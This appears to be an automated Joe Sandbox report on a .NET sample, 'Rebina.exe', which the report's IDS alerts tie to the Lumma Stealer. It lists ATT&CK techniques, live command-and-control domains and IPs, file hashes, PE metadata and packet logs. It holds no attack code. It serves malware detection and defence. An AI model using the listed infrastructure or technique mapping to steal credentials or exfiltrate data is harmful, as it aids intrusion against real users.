Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	41 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	12 System Information Discovery	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Rebina.exe	60%	Virustotal		Browse
Rebina.exe	100%	Avira	HEUR/AGEN.1357677

Source	Detection	Scanner	Label	Link
assumptionflattyou.shop	16%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe
evoliutwoqm.shop	0%	Avira URL Cloud	safe
condedqpwqm.shop	100%	Avira URL Cloud	phishing
https://assumptionflattyou.shop/api	100%	Avira URL Cloud	phishing
stamppreewntnq.shop	100%	Avira URL Cloud	phishing
assumptionflattyou.shop	100%	Avira URL Cloud	phishing
caffegclasiqwp.shop	100%	Avira URL Cloud	malware
locatedblsoqp.shop	100%	Avira URL Cloud	phishing
https://assumptionflattyou.shop/api	14%	Virustotal		Browse
assumptionflattyou.shop	16%	Virustotal		Browse
stamppreewntnq.shop	18%	Virustotal		Browse
https://assumptionflattyou.shop/	100%	Avira URL Cloud	phishing
condedqpwqm.shop	18%	Virustotal		Browse
https://assumptionflattyou.shop/api:	100%	Avira URL Cloud	phishing
evoliutwoqm.shop	6%	Virustotal		Browse
millyscroqwp.shop	100%	Avira URL Cloud	malware
https://assumptionflattyou.shop/pic	100%	Avira URL Cloud	phishing
locatedblsoqp.shop	18%	Virustotal		Browse
stagedchheiqwo.shop	100%	Avira URL Cloud	phishing
traineiwnqo.shop	100%	Avira URL Cloud	malware
https://assumptionflattyou.shop/	16%	Virustotal		Browse
millyscroqwp.shop	22%	Virustotal		Browse
stagedchheiqwo.shop	18%	Virustotal		Browse
caffegclasiqwp.shop	21%	Virustotal		Browse
traineiwnqo.shop	21%	Virustotal		Browse
https://assumptionflattyou.shop/api:	14%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
assumptionflattyou.shop	104.21.66.182	true	true	16%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
stamppreewntnq.shop	true	18%, Virustotal, Browse Avira URL Cloud: phishing	unknown
condedqpwqm.shop	true	18%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://assumptionflattyou.shop/api	true	14%, Virustotal, Browse Avira URL Cloud: phishing	unknown
evoliutwoqm.shop	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
assumptionflattyou.shop	true	16%, Virustotal, Browse Avira URL Cloud: phishing	unknown
locatedblsoqp.shop	true	18%, Virustotal, Browse Avira URL Cloud: phishing	unknown
caffegclasiqwp.shop	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
millyscroqwp.shop	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
stagedchheiqwo.shop	true	18%, Virustotal, Browse Avira URL Cloud: phishing	unknown
traineiwnqo.shop	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.8.dr	false	URL Reputation: safe	unknown
https://assumptionflattyou.shop/	RegAsm.exe, 00000004.00000002.2248451370.000000000105A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://assumptionflattyou.shop/api:	RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://assumptionflattyou.shop/pic	RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.66.182	assumptionflattyou.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1500380
Start date and time:	2024-08-28 11:16:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Rebina.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/6@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 15 Number of non-executed functions: 55
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94, 13.89.179.12
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:17:00	API Interceptor	1x Sleep call for process: RegAsm.exe modified
05:17:18	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.66.182	https://assets-usa.mkt.dynamics.com/492791da-6fc7-ee11-9075-6045bd00390b/digitalassets/standaloneforms/35c1b077-37d2-ee11-9079-000d3a32e3b3	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
assumptionflattyou.shop	80441fcf.exe	Get hash	malicious	LummaC	Browse	172.67.163.54

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	setup.exe	Get hash	malicious	LummaC	Browse	104.21.42.119
	Payment Details.exe	Get hash	malicious	FormBook	Browse	104.21.72.245
	https://en.aiacademy.tw	Get hash	malicious	Unknown	Browse	104.17.24.14
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://emea.dcv.ms/haHCQHi4RD	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://iv1tm.ykrbkt.ru/iV1TM/#hans.wurst@us.com	Get hash	malicious	HTMLPhisher	Browse	172.67.153.202
	https://aka.ms/LearnAboutSenderIdentification	Get hash	malicious	HTMLPhisher	Browse	104.18.36.155
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	setup.exe	Get hash	malicious	LummaC	Browse	104.21.66.182
	UploadCustomersTemplate(2).xlsm	Get hash	malicious	Unknown	Browse	104.21.66.182
	file.exe	Get hash	malicious	Unknown	Browse	104.21.66.182
	file.exe	Get hash	malicious	Unknown	Browse	104.21.66.182
	bViL3vNljZ.exe	Get hash	malicious	Unknown	Browse	104.21.66.182
	bViL3vNljZ.exe	Get hash	malicious	Unknown	Browse	104.21.66.182
	run.exe	Get hash	malicious	Crypto Miner	Browse	104.21.66.182
	Apponde2.exe	Get hash	malicious	AveMaria, UACMe, XRed	Browse	104.21.66.182
	file.exe	Get hash	malicious	LummaC	Browse	104.21.66.182
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.66.182

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_cdf1f590d4d1aeb836bb3e9d80b6b2ec3c893ae1_80aeb773_14a7aa62-d666-4161-b5bb-c20704d60ba3\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9881684844940527
Encrypted:	false
SSDEEP:	192:DBqZeFy/G+505RLpjezEK2zuiFIZ24IO88:83G+a5RLpjeozuiFIY4IO88
MD5:	38A0A4D4CD01AC9C33B656D38165768F
SHA1:	1177EC8874FCCD7F98693FC32DECE2DA29F434A5
SHA-256:	D064900CB6EB901669BEC50A8CB26044F99A18E2C8111B7E7C6325984F0DBDF0
SHA-512:	D327F508D34F804C2280131A6DD96C402B1FCE5EAC5420CD1E95C2D454D25A2EABA1B57DCA057A51FD2E7E656EE434A7FCB2F946DAF14301DD4AADE32371D0F1
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.3.1.0.2.2.2.2.5.9.9.4.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.3.1.0.2.2.2.6.8.1.8.0.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.a.7.a.a.6.2.-.d.6.6.6.-.4.1.6.1.-.b.5.b.b.-.c.2.0.7.0.4.d.6.0.b.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.3.4.1.d.0.d.-.8.f.f.e.-.4.1.f.4.-.a.3.4.a.-.f.1.f.e.5.4.6.2.b.4.7.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.7.0.-.0.0.0.1.-.0.0.1.4.-.f.8.d.0.-.8.0.0.9.2.b.f.9.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.R.e.g.A.s.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER71BA.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Aug 28 09:17:02 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	91678
Entropy (8bit):	2.010325139279081
Encrypted:	false
SSDEEP:	384:JkMJV5HnE69ebjfW45aNETolGnPm7utxNdamYkf:JJ5n0jfW45oGPm7ixf/
MD5:	AA457A89964C8122A981B8D169FD27F0
SHA1:	183E0DEFFB5EF88B45E5123CC669DC13C09B0724
SHA-256:	879022D02E4E6C8A332AA20031F435C2111608E657C1E27EFA0C0DA8DE39D205
SHA-512:	1AC25F429CBBA3A98628F5E7B3B920551610132EEF2AB0DF13E390AC73F2A59CDB05898EF6AAB9D422D0F8170991849C69A8DF407C01B8F3163C4F78BA1B3920
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f............T...........8...h.......<...............>?..........`.......8...........T............>...'.......................!..............................................................................eJ......`"......GenuineIntel............T.......p......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER72A5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6348
Entropy (8bit):	3.7092062891647277
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbAq6bMY1JUf6i5a5aMQUG89b5psff4Szm:R6l7wVeJAq6bMY1JUspDG89b5psfgSzm
MD5:	03C356249770C2046959BF0E539C37BF
SHA1:	82AD79460051DA43814B4C8746DB9D4B090343A4
SHA-256:	ED664B551B19C7FB6795C4599FE9287AB165B749E2A5F41CBD2C2B35373CB109
SHA-512:	781C62DC19F194BE896FAD0169E6AE075A1218E66927177CC5127C321DF2BEA9F34D1EE1B55FD87DA0356B5E5C82EF4129F9629E3F2266CED018B6A875341606
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER72D5.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4737
Entropy (8bit):	4.43403653891875
Encrypted:	false
SSDEEP:	48:cvIwWl8zs6Jg77aI95WWpW8VYrYm8M4JfuR1eFK+q8vsR1eQgLuOLuhrd:uIjfII7737VDJfuzhKszeBukuhrd
MD5:	107F75A74944D0CC113BC9DA4F5FCEE5
SHA1:	6AD29E1165F73F0395066A5618939C0941DF8D01
SHA-256:	F5FDA09699AD7D9C3864484EDD647F2B9CB8D4D73F12AC652D1319D2311D374F
SHA-512:	307B850B9E4373C83E11CAD40538C49EC983495C67EDB878FF7CAF7AF9520DB32CA764444811B4B1DCAEC3551BD1EBAC040AC0CA3B7B56A221790E55430D3F25
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="475219" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Rebina.exe.log

Download File

Process:	C:\Users\user\Desktop\Rebina.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.422374691462711
Encrypted:	false
SSDEEP:	6144:lSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNk0uhiTw:svloTyW+EZMM6DFye03w
MD5:	8ED495D0FAABEA34036D676EF6217D05
SHA1:	67275626AF9493A46D471E2BD149BB2B703EB0AA
SHA-256:	F98B66082B67BACA917372CD43FD359CF99B779347D4556F5EBD66FF78700D61
SHA-512:	21FAA5773884101641D633255AD6E429E2675EB435F8C2744C86EFDDAF59854294A61BE4A8F5CC951C1F6A8346DBA14905C421B17F30F521DBD99D4F50B95CCC
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.}..+................................................................................................................................................................................................................................................................................................................................................N.>........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.985952277085943
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Rebina.exe
File size:	292'352 bytes
MD5:	30cbc399e37eef662eaeb7d90148f013
SHA1:	349839e58f61a81512d2545bd70ca0d0d7baa549
SHA256:	bfde2ff885475fc1212ff255cc5f4e17b0ede10a8ee21b7b83cd34fc0ad73a03
SHA512:	821921b0bbf6472a2d2c9bfcb16b574b4b8f3d39a87de6b8519d26f419fb57adcfd9773fb9098c827404355331398b683c162f48fc33702dfe75e8068b667491
SSDEEP:	6144:7vFbmrw0Bo5jT5jI5wG1BGkdshosD++gtFLJh3gPK6OcpcVfCZK5V:58w0WTjfsBGkqd++VSupkfCE
TLSH:	DD542377B788CBD6EF1D3B795E183216A2A1F6C6405BDF053D4462E48E392E385823C6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................l..........~.... ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x448b7e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66CBB4F6 [Sun Aug 25 22:49:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x48b28	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4a000	0x5b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x489f0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x46b84	0x46c00	ad997e56abcfdc446e072f1c1a242a28	False	0.9925256735865724	data	7.994595123284687	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4a000	0x5b8	0x600	b3436a9230e3967a868bb2ffadc57bda	False	0.4329427083333333	data	4.1126341791758	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4c000	0xc	0x200	9df8ed85660499e5794476e7a65fc83b	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x4a0a0	0x328	data			0.44925742574257427
RT_MANIFEST	0x4a3c8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-28T11:17:02.186665+0200	TCP	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	49705	443	192.168.2.5	104.21.66.182
2024-08-28T11:17:02.186665+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49705	443	192.168.2.5	104.21.66.182
2024-08-28T11:17:01.289610+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49704	443	192.168.2.5	104.21.66.182
2024-08-28T11:17:01.289610+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49704	443	192.168.2.5	104.21.66.182

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 28, 2024 11:17:00.639401913 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:00.639434099 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:00.639527082 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:00.640769005 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:00.640785933 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.127248049 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.127331972 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.131596088 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.131604910 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.131890059 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.181319952 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.186429977 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.186429977 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.186561108 CEST	443	49704	104.21.66.182	192.168.2.5
